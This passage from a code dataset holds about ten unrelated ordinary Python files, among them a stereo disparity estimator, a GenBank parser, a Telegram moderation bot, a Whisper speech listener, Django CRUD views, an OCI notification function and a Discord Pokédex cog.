cv2.circle(color_frame_patch,template_c,2,(0,0,255),-1)\n # cv2.rectangle(color_frame_patch, (left, top), (left + template_width, top + template_height),(0,0,255), 1) # red\n # # cv2.imshow('color_frame_patch',color_frame_patch)\n\n template_height_small = int(template_height * 2 / 3) # smaller window size to compute finer disparity\n template_width_small = template_height_small\n top_small = template_c[1] -int(template_height_small * 0.5)\n left_small = template_c[0] - int(template_width_small * 0.5)\n template_small = pre_frame_img[top_small:top_small + template_height_small, left_small:left_small + template_width_small]\n\n finer_range = int(template_height/6) + int(template_width_small * 0.5)\n ev_epi_img_small = ev_img[top_small:top_small+template_height_small,e_max_x-finer_range:e_max_x+finer_range] # top down left right\n # cv2.imshow('ev_epi_img_small',ev_epi_img_small)\n\n epi_result_small = cv2.matchTemplate(ev_epi_img_small, template_small, cv2.TM_CCOEFF_NORMED) # shape (1,621)\n _, max_val_small, _, max_loc_small = cv2.minMaxLoc(epi_result_small)\n e_max_x_small = e_max_x-finer_range + int(template_width_small * 0.5) + max_loc_small[0] # left + half_template + max\n # print(\"e_max_x\",e_max_x,'e_max_x_small',e_max_x_small)\n\n # #debug\n # ev_img_color = cv2.cvtColor(ev_img, cv2.COLOR_GRAY2BGR)\n # cv2.circle(ev_img_color,([e_max_x_small,template_c[1]]),2,(0,255,255),-1)\n # cv2.rectangle(ev_img_color, (e_max_x_small-int(template_width_small * 0.5),top_small), (e_max_x_small + int(template_width_small * 0.5),top_small + template_height_small), (0,255,255), 1) # yellow\n # # cv2.imshow('ev_img_find1',ev_img_color)\n\n # # color_frame_patch = cv2.cvtColor(pre_frame_img, cv2.COLOR_GRAY2BGR)\n # cv2.rectangle(color_frame_patch, (left_small, top_small), (left_small + template_width_small, top_small + template_height_small),(0,0,255), 1) # red\n # # cv2.imshow('color_frame_patch1',color_frame_patch)\n # cv2.imshow('combine',cv2.hconcat([color_frame_patch,ev_img_color]))\n\n # k = cv2.waitKey(0)\n # if k == 27: # ESC\n # cv2.destroyAllWindows() \n\n disp2 = template_c[0] - e_max_x_small\n # print('disp',disp,'disp2',disp2)\n\n if disp2 < 0 or disp2 > 100 : # TODO need to fill in the hole\n # if max_val < 0.45 or disp < 0 or disp > 100 :\n disp2 = 0\n test_wr_num = test_wr_num+1\n\n disparity_map[y,x] = disp2\n\n print('step_num',step_num,'wrong_num',wrong_num,'disp < 0 or disp > 100',test_wr_num)\n disparity_map_uint8 = np.uint8(disparity_map)\n cv2.imwrite(save_path + '/' + 'origin_disparitymap_tsukuba' + '.png',disparity_map_uint8) \n\n return disparity_map # ? 
0-255 cause fault unit8\n\nif __name__ == '__main__':\n save_path = '/Users/cainan/Desktop/Project/data/processed/disparity'\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n '''\n LOAD DATA\n '''\n pre_frame_img, ev_img = load_data()\n\n '''\n processing \n '''\n disparity_map = compute_pyramid_NCC(pre_frame_img,ev_img)\n disp_norm = img_normalization(disparity_map) \n\n # medianblur_disp = cv2.medianBlur(disparity_map,3)\n # disp_norm = img_normalization(medianblur_disp) \n \n cv2.imshow(\"disp_norm\",disp_norm)\n \n k = cv2.waitKey(0)\n if k == 27: # ESC\n cv2.imwrite(save_path + '/' + 'pyramid230_tsukuba' + '.png',disp_norm)\n cv2.destroyAllWindows() \n\n\n\n\n\n\n\n\n","repo_name":"NannCai/Stereo_Disparity_Estimation","sub_path":"draft/disparity_pyramid_tsukuba.py","file_name":"disparity_pyramid_tsukuba.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
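The core move in the disparity record above is worth isolating: because the pair is rectified, cv2.matchTemplate can be restricted to the epipolar row band, turning a 2-D patch search into a 1-D one. A minimal sketch under that assumption (the image arrays, coordinates, and patch size are placeholders; TM_CCOEFF_NORMED is the actual OpenCV normalized cross-correlation mode):

import cv2

def epipolar_ncc_disparity(left, right, x, y, half=15):
    # Cut the reference patch from the left image.
    template = left[y - half:y + half, x - half:x + half]
    # Search only the matching row band of the right image.
    band = right[y - half:y + half, :]
    scores = cv2.matchTemplate(band, template, cv2.TM_CCOEFF_NORMED)
    _, _, _, max_loc = cv2.minMaxLoc(scores)
    best_x = max_loc[0] + half   # back to patch-centre coordinates
    return x - best_x            # positive for a standard left/right pair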
+{"seq_id":"34867986664","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# AF - last modification: August 10th 2018\n# Script name : gene_position_gb_extraction.py\n#\n# Description : this script take a genbank file as input file and extract the\n# virus accession number, the genome size and the start_N_end\n# positions of all genes and store these data in a json file.\n#\n# IMPORTANT_TO_NOTE : * The second to last part of this script has specifically\n# been written to work with Coronaviruses genome. You may\n# want to comment this part in order use the script for\n# other virus genome\n#\n################################################################################\n\n# ~ start script ~ #\n\n##############\n### Modules ##\n##############\n\nimport re\nimport json\nimport argparse\nimport sys\n\n###############\n## Functions ##\n###############\n\ndef get_min(dico):\n min_list = []\n for key in dico:\n if key != \"genomesize\" and key != \"virus_id\":\n min_list.append(dico[key][0])\n return min(min_list)\n\ndef get_max(dico):\n max_list = []\n for key in dico:\n if key != \"genomesize\" and key != \"virus_id\":\n max_list.append(dico[key][1])\n return max(max_list)\n\n#################\n## Main Script ##\n#################\n\n\n## call for the command line arguments ##\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help = \"the gb file you want to parse\",\\\n type = str)\nparser.add_argument(\"-o\", \"--output\", help = \"the output file to create\",\\\n type = str)\nparser.add_argument(\"-a\", \"--virus_acronym\", help = \"write the virus acronym\",\\\n type = str)\n\narg = parser.parse_args()\n\n## check for the presence of all command line arguements ##\nif not arg.input or not arg.output or not arg.virus_acronym:\n parser.print_help()\n sys.exit(\"\\nAn error occured while entering the arguments.\\n\\\nAll three arguments are necessary, please read the help section above.\\n\")\n\n\n## call for a dictionnary to store data ##\ndico = {}\n\n## opening and reading the genbank file ##\nwith open(arg.input,\"r\") as filein:\n line = filein.readline()\n regex1 = re.compile('^LOCUS {7}[A-Z0-9_]+ +([0-9]+)')\n regex1bis = re.compile('^VERSION {5}([A-Z0-9_\\.]+)')\n # match à la première ligne du fichier\n r = regex1.search(line)\n dico[\"genomesize\"] = int(r.group(1))\n\n # get the accession number of the sequence associated with its version\n for line_bis in filein:\n if \"VERSION\" in line_bis:\n r_bis = regex1bis.search(line_bis)\n dico[\"virus_id\"] = arg.virus_acronym + \"_\" + r_bis.group(1)\n break\n\n # because we are not interested by the head section anymore, we escape it\n # using the following while loop\n while \"FEATURES\" not in line:\n line = filein.readline()\n\n regex2 = \\\nre.compile('^\\ {5}CDS\\ {13}join\\(([0-9]+)\\.{2}[0-9]+,[0-9]+\\.{2}([0-9]+)\\)')\n # match lines with 'CDS' and 'join', for the fragmented genes\n\n regex3 = re.compile('^\\ {5}CDS\\ {13}([0-9]+)\\.{2}([0-9]+)')\n # match lines with 'CDS' for the unfragmented genes\n\n regex4 = re.compile('^\\ {21}/product=[\\\"\\']([A-Za-z0-9 -_]+)[\\\"\\']')\n # match lines with '/product' to recover the product name of the gene\n\n flag = False # set a flag to make my life easier\n\n while \"ORIGIN\" not in line:\n\n if flag == True:# this is set \"ON\" when a CDS has previously been found\n\n if regex4.match(line):# look for the product name of the gene\n r = regex4.search(line)\n product_id = r.group(1)\n dico[product_id] = geneposition\n flag = False # set \"OFF\", in 
order to look for another gene\n line = filein.readline()\n\n else:\n line = filein.readline()\n\n elif regex2.match(line): # look fragmented genes\n r = regex2.search(line)\n geneposition = [ int(r.group(1)) , int(r.group(2)) ]\n flag = True\n line = filein.readline()\n\n elif regex3.match(line): # look for unfragmented genes\n r = regex3.search(line)\n geneposition = [ int(r.group(1)) , int(r.group(2)) ]\n flag = True\n line = filein.readline()\n\n else:\n line = filein.readline()\n\n\n## add UTR's region to dictionnary ##\ndico[\"UTR5\"] = [1,get_min(dico)-1]\ndico[\"UTR3\"] = [get_max(dico)+1, dico[\"genomesize\"]]\n\n## writting the data into a json file ##\n\nfilout = open(arg.output,\"w\",encoding = 'utf-8')\njson.dump(dico, filout, ensure_ascii = False)\nfilout.close()\n\n# ~ end of script ~ #\n","repo_name":"ALFLAG/Viral_Variant_Visualiser","sub_path":"SCRIPTS_PYTHON/extract_gene_position_from_gb_file.py","file_name":"extract_gene_position_from_gb_file.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"}
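The three regexes above carry the whole GenBank parser, so a quick self-check is useful; the feature lines below are fabricated but follow the fixed-width layout the patterns assume (5 spaces, "CDS", 13 spaces before the location):

import re

unfragmented = re.compile(r'^\ {5}CDS\ {13}([0-9]+)\.{2}([0-9]+)')
fragmented = re.compile(r'^\ {5}CDS\ {13}join\(([0-9]+)\.{2}[0-9]+,[0-9]+\.{2}([0-9]+)\)')

m = unfragmented.search("     CDS             266..13483")
print(m.group(1), m.group(2))   # -> 266 13483
m = fragmented.search("     CDS             join(266..13468,13468..21555)")
print(m.group(1), m.group(2))   # -> 266 21555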
+{"seq_id":"15222109665","text":"import telebot\nfrom telebot import types\n\n# Configurações do bot\nTOKEN = 'SEU_TOKEN_AQUI'\nbot = telebot.TeleBot(TOKEN)\n\n# Lista de IDs de administradores do grupo\nadmins = [123456789, 987654321] # Substitua pelos IDs reais dos administradores\n\n# Comando /start\n@bot.message_handler(commands=['start'])\ndef start(message):\n bot.send_message(message.chat.id, \"Olá! Eu sou o bot moderador. Apenas administradores podem usar meus comandos.\")\n\n# Comando /ban\n@bot.message_handler(commands=['ban'])\ndef ban_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.ban_chat_member(message.chat.id, user_id)\n else:\n bot.reply_to(message, \"Você não tem permissão para banir membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /warn\n@bot.message_handler(commands=['warn'])\ndef warn_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.send_message(message.chat.id, f\"Usuário {user_id} foi advertido.\")\n else:\n bot.reply_to(message, \"Você não tem permissão para advertir membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /kick\n@bot.message_handler(commands=['kick'])\ndef kick_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.kick_chat_member(message.chat.id, user_id)\n else:\n bot.reply_to(message, \"Você não tem permissão para expulsar membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /mute\n@bot.message_handler(commands=['mute'])\ndef mute_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.restrict_chat_member(message.chat.id, user_id, until_date=None, can_send_messages=False)\n else:\n bot.reply_to(message, \"Você não tem permissão para silenciar membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /del\n@bot.message_handler(commands=['del'])\ndef delete_message(message):\n if is_admin(message.from_user.id):\n user_id = get_mentioned_user_id(message)\n if user_id:\n bot.delete_message(message.chat.id, message.message_id)\n else:\n bot.reply_to(message, \"Você precisa mencionar o usuário cuja mensagem deseja apagar.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Verifica se o remetente da mensagem é um administrador\ndef is_admin(user_id):\n return user_id in admins\n\n# Obtém o ID do usuário mencionado na mensagem\ndef get_mentioned_user_id(message):\n user_id = None\n if message.reply_to_message:\n user_id = message.reply_to_message.from_user.id\n elif message.entities:\n for entity in message.entities:\n if entity.type == 'text_mention':\n user_id = entity.user.id\n return user_id\n\nif __name__ == '__main__':\n bot.polling()\n","repo_name":"VILHALVA/CURSO-DE-TELEGRAM-BOT","sub_path":"MODULO 4/14) VIA COMANDOS/MODERADOR.py","file_name":"MODERADOR.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"}
+{"seq_id":"9077452878","text":"import os\nfrom faster_whisper import WhisperModel\nimport numpy as np\nimport sounddevice as sd\nimport soundfile as sf\nfrom colorama import Fore, Style\nfrom typing import Optional, Tuple, Callable\nfrom scipy.io import wavfile\nimport io\n\n# SETTINGS\nMODEL_PATH: str = f\"whisper-base.en/\"\nENGLISH_ONLY: bool = True # English only model\nECHO: bool = False # Hear your own voice for debugging\nINPUT_DEVICE: Optional[Tuple[int, int]] = None# (4, 4) # [Input_ID, Output_ID] You can check this with sd.query_devices()\nFREQ_RANGE: Tuple[int, int] = (50, 1000) # Frequency to detect valid sounds \nSAMPLE_RATE: int = 44100 # Stream device recording frequency\nBLOCK_SIZE: int = 30 # Block size in milliseconds\nTHRESHOLD: float = 0.1 # Minimum volume threshold to activate listening\nEND_BLOCKS: int = 30 # Wait block for Whisper\n\n\n# CONSTANTS\nNP_ZEROS = np.zeros((0, 1))\n\n# Create a fake assistant if listener is being ran as main for testing\nclass fakeAssistant(): \n running: bool = True\n talking: bool = False\n analyze: Optional[Callable] = None\n\nclass StreamHandler:\n def __init__(self, assistant=fakeAssistant()):\n self.assistant = assistant\n self.padding: int = 0\n self.running: bool = True\n self.audio_ready: bool = False\n self.buffer: np.ndarray = NP_ZEROS\n self.prev_block: np.ndarray = NP_ZEROS\n self.audio: np.ndarray = NP_ZEROS\n sd.default.device = INPUT_DEVICE or sd.default.device # type: ignore\n print(f\"Using Audio Device: {Style.BRIGHT}{Fore.GREEN}{sd.default.device}\")\n self.model: WhisperModel = WhisperModel(MODEL_PATH, device=\"cpu\", compute_type=\"int8\")\n print(Style.BRIGHT + Fore.BLUE + \"Loaded Model\" + Style.RESET_ALL)\n\n\n def callback(self, indata: np.ndarray, frames: int, time, status: sd.CallbackFlags) -> None:\n if not any(indata):\n raise Exception(Style.BRIGHT + Fore.RED + \"No Input Recieved. 
Is your 'INPUT_DEVICE' Correct?\" + Style.RESET_ALL)\n \n if indata.max() > THRESHOLD and not self.assistant.talking:\n if self.padding < 1: self.buffer = self.prev_block.copy()\n self.buffer = np.concatenate((self.buffer, indata))\n self.padding = END_BLOCKS\n else:\n self.padding -= 1\n if self.padding > 1:\n self.buffer = np.concatenate((self.buffer, indata))\n \n elif self.padding < 1 < self.buffer.shape[0] > SAMPLE_RATE: # If enough silence has passed, write to file\n if ECHO:\n self.assistant.talking = True\n sd.play(self.buffer, SAMPLE_RATE)\n sd.wait()\n self.assistant.talking = False\n \n # wavfile.write(\"dictate.wav\", SAMPLE_RATE, self.buffer)\n self.audio = self.buffer.copy();\n self.buffer = NP_ZEROS\n self.audio_ready = True\n \n elif self.padding < 1 < self.buffer.shape[0] < SAMPLE_RATE:\n self.buffer = NP_ZEROS\n else:\n self.prev_block = indata.copy()\n\n\n def process(self):\n if self.audio_ready:\n # Convert audio to io file\n # import time;\n # init_time = time.time()\n\n bytes_wav = bytes()\n bytes_io = io.BytesIO(bytes_wav)\n wavfile.write(bytes_io, rate=SAMPLE_RATE, data=self.audio)\n\n # print(self.audio)\n segments, info = self.model.transcribe(bytes_io, language=\"en\", beam_size=3)\n result: str = \"\".join(x.text for x in segments)\n # print(time.time() - init_time)\n print(f\"{Style.BRIGHT}{Fore.BLUE}Recieved Result:{Style.RESET_ALL} {result}\")\n if self.assistant.analyze is not None: self.assistant.analyze(result)\n self.audio_ready = False\n\n\n def listen(self) -> None:\n print(Style.BRIGHT + Fore.GREEN + \"Listening\" + Style.RESET_ALL)\n with sd.InputStream(channels=1, callback=self.callback, blocksize=int(SAMPLE_RATE * BLOCK_SIZE / 1000), samplerate=SAMPLE_RATE):\n while self.running and self.assistant.running: self.process();\n\ndef main():\n try:\n handler = StreamHandler()\n handler.listen()\n except (KeyboardInterrupt, SystemExit): pass\n finally:\n if os.path.exists(\"dictate.wav\"): os.remove(\"dictate.wav\");\n print(\"Exited Program\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"royce-mathew/Adam","sub_path":"src/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
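The detail that makes the listener above file-free is that faster-whisper's transcribe() accepts a file-like object, so the capture buffer can be wrapped as a WAV entirely in memory. A stripped-down reproduction of that path (the one-second silent buffer stands in for real captured audio, and the explicit rewind is a defensive addition):

import io
import numpy as np
from scipy.io import wavfile
from faster_whisper import WhisperModel

model = WhisperModel("base.en", device="cpu", compute_type="int8")
audio = np.zeros((44100, 1), dtype=np.float32)   # placeholder capture buffer
buf = io.BytesIO()
wavfile.write(buf, rate=44100, data=audio)       # wrap it as an in-memory WAV
buf.seek(0)                                      # rewind before decoding
segments, _info = model.transcribe(buf, language="en", beam_size=3)
print("".join(segment.text for segment in segments))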
+{"seq_id":"33452866358","text":"import json\n\nfrom sports_bettors.api import api\n\n\ndef _parse_inputs(inputs: dict) -> dict:\n # Required fields\n league = {'College Football': 'college_football', 'NFL': 'nfl'}.get(inputs['league'])\n required = {\n 'league': league,\n 'random_effect': inputs['random_effect'],\n 'feature_set': inputs['feature_set']\n }\n\n # Feature values for conditions (must include RandomEffect)\n options = [json.loads(input_) for input_ in inputs.getlist('inputs[]')]\n options = {item['name']: item['value'] for item in options}\n\n required['inputs'] = {k: float(v) for k, v in options.items() if k != 'RandomEffect'}\n required['inputs'].update({'RandomEffect': options['RandomEffect']})\n\n return required\n\n\ndef _parse_outputs(output: dict) -> dict:\n \"\"\"\n We are fixing the random effect and feature set, so only need the response key of sb-output\n \"\"\"\n return {k[2]: v for k, v in output.items()}\n\n\ndef sb_api(inputs: dict):\n # Parse inputs\n inputs = _parse_inputs(inputs)\n\n # Get betting probabilities\n output = api(**inputs)\n\n return _parse_outputs(output)\n","repo_name":"spwhite1337/website","sub_path":"backend/apis/utils/sports_bettors/sports_bettors.py","file_name":"sports_bettors.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"13466397702","text":"from PySide6 import QtCore, QtGui, QtWidgets\nfrom PySide6.QtCore import Slot\n\nfrom sidegrip import CSizeGrip, SideGrip\nfrom note_contents import noteContents\nimport db\n\n\nclass noteWindow(QtWidgets.QMainWindow):\n def __init__(self, obj=None):\n super().__init__()\n\n self.resize(360, 360)\n self.setMinimumSize(90, 90)\n self.setWindowOpacity(0.9)\n self.setWindowFlags(self.windowFlags() | QtCore.Qt.FramelessWindowHint)\n\n self.sideGrips = None\n self.cornerGrips = None\n self.setGrips()\n\n self._prev_pos = None\n self._drag_active = False\n\n p = QtGui.QPalette()\n p.setColor(QtGui.QPalette.Window, QtGui.QColor(48, 48, 48))\n self.setPalette(p)\n\n f = noteContents(parent=self)\n self.setCentralWidget(f)\n self.centralWidget()\n\n self.show()\n self.raise_()\n\n if obj:\n self.obj = obj\n self.load()\n else:\n self.obj = db.Note()\n self.save()\n\n _gripSize = 8\n\n @property\n def gripSize(self):\n return self._gripSize\n\n def setGrips(self):\n self.sideGrips = [\n SideGrip(self, QtCore.Qt.LeftEdge),\n SideGrip(self, QtCore.Qt.TopEdge),\n SideGrip(self, QtCore.Qt.RightEdge),\n SideGrip(self, QtCore.Qt.BottomEdge),\n ]\n\n self.cornerGrips = []\n for _ in range(4):\n g = CSizeGrip(self)\n self.cornerGrips.append(g)\n\n def setGripSize(self, size):\n if size == self._gripSize:\n return\n self._gripSize = max(2, size)\n self.updateGrips()\n\n def updateGrips(self):\n self.setContentsMargins(*[self.gripSize] * 4)\n\n out_rect = self.rect()\n # an \"inner\" rect used for reference to set the geometries of size grips\n in_rect = out_rect.adjusted(self.gripSize, self.gripSize, -self.gripSize, -self.gripSize)\n\n # top left corner\n self.cornerGrips[0].setGeometry(\n QtCore.QRect(out_rect.topLeft(), in_rect.topLeft()))\n # top right corner\n self.cornerGrips[1].setGeometry(\n QtCore.QRect(out_rect.topRight(), in_rect.topRight()).normalized())\n # bottom right corner\n self.cornerGrips[2].setGeometry(\n QtCore.QRect(in_rect.bottomRight(), out_rect.bottomRight()))\n # bottom left corner\n self.cornerGrips[3].setGeometry(\n QtCore.QRect(out_rect.bottomLeft(), in_rect.bottomLeft()).normalized())\n\n # left edge\n self.sideGrips[0].setGeometry(\n 0, in_rect.top(), self.gripSize, in_rect.height())\n # top edge\n self.sideGrips[1].setGeometry(\n in_rect.left(), 0, in_rect.width(), self.gripSize)\n # right edge\n self.sideGrips[2].setGeometry(\n in_rect.left() + in_rect.width(),\n in_rect.top(), self.gripSize, in_rect.height())\n # bottom edge\n self.sideGrips[3].setGeometry(\n self.gripSize, in_rect.top() + in_rect.height(),\n in_rect.width(), self.gripSize)\n\n def load(self):\n self.move(self.obj.x, self.obj.y)\n self.resize(self.obj.w, self.obj.h)\n QtWidgets.QApplication.instance().activeNotes[self.obj.id] = self\n\n def save(self):\n self.obj.x = self.x()\n self.obj.y = self.y()\n self.obj.w = self.width()\n self.obj.h = self.height()\n db.session.add(self.obj)\n db.session.commit()\n print(self.obj)\n QtWidgets.QApplication.instance().activeNotes[self.obj.id] = self\n\n @Slot()\n def delete(self):\n db.session.delete(self.obj)\n db.session.commit()\n self.close()\n\n def resizeEvent(self, event):\n QtWidgets.QMainWindow.resizeEvent(self, event)\n self.updateGrips()\n\n def mousePressEvent(self, e):\n self._prev_pos = e.globalPosition().toPoint()\n self.setCursor(QtCore.Qt.ClosedHandCursor)\n\n def mouseMoveEvent(self, e):\n delta = e.globalPosition().toPoint() - self._prev_pos\n self.move(self.x() + delta.x(), self.y() + delta.y())\n self._prev_pos = 
e.globalPosition().toPoint()\n\n self._drag_active = True\n\n def mouseReleaseEvent(self, e):\n if self._drag_active:\n self.save()\n self._prev_pos = None\n self._drag_active = False\n self.setCursor(QtCore.Qt.ArrowCursor)\n","repo_name":"colin-m-davis/stuck","sub_path":"note_window.py","file_name":"note_window.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"6217272624","text":"def text_processor(title,content):\n relevant=0\n severity=0\n deaths=0\n tamadas=[u'támad',u'sebes']\n for i in tamadas:\n if i in title+content:\n relevant=1\n severity=3\n tamadas=[u'halál',u'áldozat',u'ölt ',u'pusztít']\n for i in tamadas:\n if i in title+content:\n relevant=1\n severity=4\n tamadas=[u'medve',u'medvé']\n for i in tamadas:\n if i in title.replace(',',' ').replace('.',' ').lower():\n relevant=1\n for i in tamadas:\n if (u'medv' or u'nagyvad') not in title+content:\n relevant=-1\n tamadas=[u'medvegyev',u'medveczky',u'jegesmedvék',u'medvehagyma',u'aranymedve',u'szibéria',u' kupa',\n u'jégkorong',u'kosárlabda',u'labdarúgás',u'labdarúgó',u'steaua',\n u'c osztály',u'berlin',u'állatkert',u'medve-tó',u'oroszorsz',u' orosz ']\n for i in tamadas:\n if i in (title+content).replace(',',' ').replace('.',' ').lower():\n relevant=-1\n return relevant,severity,deaths","repo_name":"szekelydata/medveterkep","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"1420755151","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom app.models import Student\nfrom .serializers import studentSerializer\n\n\n\n# @api_view(['GET'])\n# def getRoutes(request):\n# routes = [\n# 'GET /api',\n# 'GET /api/students',\n# 'GET /api/students/:id',\n# 'POST/api/create'\n# ]\n# return Response(routes) \n\n\n@api_view(['GET'])\ndef getStudents(request):\n students = Student.objects.all()\n serializer = studentSerializer(students, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef getStudent(request,pk):\n student = Student.objects.get(id=pk)\n serializer = studentSerializer(student, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef createStudent(request): \n serializer = studentSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef updateStudent(request,pk): \n\n student = Student.objects.get(student_id=pk)\n serializer = studentSerializer(instance=student,data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef deleteStudent(request,pk):\n student = Student.objects.get(student_id=pk)\n student.delete()\n return Response(\"You've deleted successfully!\")","repo_name":"hagonin/CRUD-Django-app","sub_path":"cruddjango/app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"25604484610","text":"import io\nimport json\nimport oci\nfrom fdk import response\n\ndef publish_notification(topic_id, msg_title, msg_body):\n signer = oci.auth.signers.get_resource_principals_signer()\n client = oci.ons.NotificationDataPlaneClient({}, signer = signer)\n msg = oci.ons.models.MessageDetails(title = msg_title, body = msg_body)\n print(msg, flush=True)\n client.publish_message(topic_id, msg)\n\ndef handler(ctx, data: io.BytesIO=None):\n try:\n body = json.loads(data.getvalue())\n topic_id = body[\"topic_id\"]\n msg_title = body[\"msg_title\"]\n msg_body = body[\"msg_body\"]\n print(\"topic_id: \" + body[\"topic_id\"], flush=True)\n print(\"msg_title: \" + body[\"msg_title\"], flush=True)\n print(\"msg_body: \" + body[\"msg_body\"], flush=True)\n except Exception as ex:\n print(\"Three arguments need to be passed to the function, topic_id, msg_title and msg_body\", ex, flush=True)\n raise\n publish_notification(topic_id, msg_title, msg_body)\n return response.Response(ctx,\n response_data={\"response\":\"email sent\"},\n headers={\"Content-Type\": \"application/json\"}\n )","repo_name":"oracle-samples/oracle-functions-samples","sub_path":"samples/oci-ons-publish-python/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"8"}
+{"seq_id":"35703245112","text":"import sys\r\nfrom discord.ext import commands\r\nimport discord\r\nimport cogs.load_json\r\n\r\nclass Pokedex():\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command(pass_context = True)\r\n async def pokedex(self,ctx, *, pkmn_name : str):\r\n \"\"\"Get the stats of a Pokemon!\"\"\"\r\n pkmn_name = pkmn_name.lower()\r\n\r\n try:\r\n data = cogs.load_json.get_poke_info()\r\n data_bool = True\r\n except:\r\n data_bool = False\r\n\r\n if pkmn_name[0:4] == \"tapu\":\r\n poke_ico_name_set = True\r\n if pkmn_name[5:] == \"koko\":\r\n poke_ico_name = \"tapu_koko\"\r\n pkmn_name = \"tapukoko\"\r\n elif pkmn_name[5:] == \"bulu\":\r\n poke_ico_name = \"tapu_bulu\"\r\n pkmn_name = \"tapubulu\"\r\n elif pkmn_name[5:] == \"fini\":\r\n poke_ico_name = \"tapu_fini\"\r\n pkmn_name = \"tapufini\"\r\n elif pkmn_name[5:] == \"lele\":\r\n poke_ico_name = \"tapu_lele\"\r\n pkmn_name = \"tapulele\"\r\n else:\r\n poke_ico_name_set = False\r\n\r\n if pkmn_name[0:4] == \"type\":\r\n poke_ico_name_set = True\r\n poke_ico_name = \"type_null\"\r\n pkmn_name = \"typenull\"\r\n \r\n pkmn_name_capt = pkmn_name.title()\r\n try:\r\n subdata = data[pkmn_name]\r\n except:\r\n await self.bot.say(\"The pokemon you searched for doesn't exist or you may have wrongly spelt the name.\")\r\n return 0\r\n\r\n type_one = subdata['types'][0]\r\n type_one = type_one.title()\r\n\r\n ability_prim = subdata['abilities']['primary']\r\n ability_prim = ability_prim.title()\r\n\r\n try:\r\n ability_hidden = subdata['abilities']['hidden']\r\n ability_hidden = ability_hidden.title()\r\n ability_final = \"Hidden : \" + ability_hidden + \"\\n\" + \"Primary : \" + ability_prim\r\n except:\r\n ability_hidden = \"No Hidden Ability\"\r\n ability_final = \"Hidden : \" + ability_hidden + \"\\n\" + \"Primary : \" + ability_prim\r\n \r\n try:\r\n type_two = subdata['types'][1]\r\n type_two = type_two.title()\r\n type_final = type_one + ', ' + type_two\r\n\r\n except:\r\n type_final = type_one\r\n pass\r\n if not poke_ico_name_set:\r\n poke_ico_name = pkmn_name.lower()\r\n poke_ico_name = poke_ico_name.replace(\" \", \"_\")\r\n poke_ico_url = \"http://smogon.com/dex/media/sprites/xy/\" + poke_ico_name + \".gif\"\r\n send_data = discord.Embed(title=pkmn_name_capt, description='***Information***', colour=0x4499E7)\r\n send_data.set_image(url=poke_ico_url)\r\n send_data.set_author(name='Pokedex', icon_url=poke_ico_url)\r\n send_data.add_field(name=\"Attack\", value=subdata['stats']['atk'], inline=True)\r\n send_data.add_field(name=\"Special Attack\", value=subdata['stats']['spa'], inline=True)\r\n send_data.add_field(name=\"Defense\", value=subdata['stats']['def'], inline=True)\r\n send_data.add_field(name=\"Special Defense\", value=subdata['stats']['spd'], inline=True)\r\n send_data.add_field(name=\"HP\", value=subdata['stats']['hp'], inline=True)\r\n send_data.add_field(name=\"Speed\", value=subdata['stats']['spe'], inline=True)\r\n send_data.add_field(name=\"Types\", value=type_final, inline=True)\r\n send_data.add_field(name=\"Abilities\", value=ability_final, inline=True)\r\n send_data.add_field(name=\"Base Experience\", value=subdata['base_exp'], inline=True)\r\n send_data.add_field(name=\"Base Friendship\", value=subdata['base_friendship'], inline=True)\r\n await self.bot.say(embed=send_data)\r\n \r\ndef setup(bot):\r\n 
bot.add_cog(Pokedex(bot))","repo_name":"The-Real-Ketchum-Dev/Silent-Trainer-Bot","sub_path":"cogs/pokedex.py","file_name":"pokedex.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
